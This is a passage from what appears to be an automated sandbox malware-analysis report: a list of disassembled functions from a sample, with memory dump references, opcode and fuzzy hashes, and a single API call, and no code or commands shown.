                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                          • Instruction ID: 89132df2e66df9c9f74ba5f634bb74c565e173fef2bea6f7727309b84e9fb2c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F03C60104B918AE7728F398524B77BFE09B23228F545A8CC5E757AD2D36AE10A8794
                                                                                                                                                                                                                                          Function 000DE0DA Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                          • Instruction ID: 8000ca1928b9c64b460c0b25d6b4151d0d3d7e3502652b137835118e747dc554
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCF065105087E28ADB634B3E84606B2AFE09F63120B181BD6C8E19B3C7C3159596C376
                                                                                                                                                                                                                                          Function 000DD116 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e4fb0bb9512584ae5ad696095bb28668d5bbe580aee3ee1683b7a4be2f7c619b
                                                                                                                                                                                                                                          • Instruction ID: 38fedc6d3f40a8dc42f940dabce06b8c13e5fea854bc75ff9fa4b1108d85736b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4fb0bb9512584ae5ad696095bb28668d5bbe580aee3ee1683b7a4be2f7c619b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 280149302402428BD304CF38CCA05B6FBA1EB92324B08C75DC05587796C638C842C794
                                                                                                                                                                                                                                          Function 00109158 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6043b4bfc70ba72f29897a1be211fc67ba706c024892a1744a754270e81db7d9
                                                                                                                                                                                                                                          • Instruction ID: facb18308d08f1fa26a1613dbb361340e496979a6ddda244336e25f0953c3e7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6043b4bfc70ba72f29897a1be211fc67ba706c024892a1744a754270e81db7d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0E2B240810E9ECB01CF24C9096EF77B4EE86330B36412AE89196982D3B14D25E799
                                                                                                                                                                                                                                          Function 000D91AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 000D91DA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                          • String ID: +Ku$wpq
                                                                                                                                                                                                                                          • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                          • Opcode ID: df1ac5f1620bb9e45bd741693368b54d2c48f5ad2097992c0cb556765f0311ba
                                                                                                                                                                                                                                          • Instruction ID: f4d251c50911b4b0bd25f24f36a884195f5119c3f3b8569a9128da3eade84895
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df1ac5f1620bb9e45bd741693368b54d2c48f5ad2097992c0cb556765f0311ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51AD7221C3528FC324CF69984076FB6E6EBC5310F55892EE499CB285DB74D50ACBA2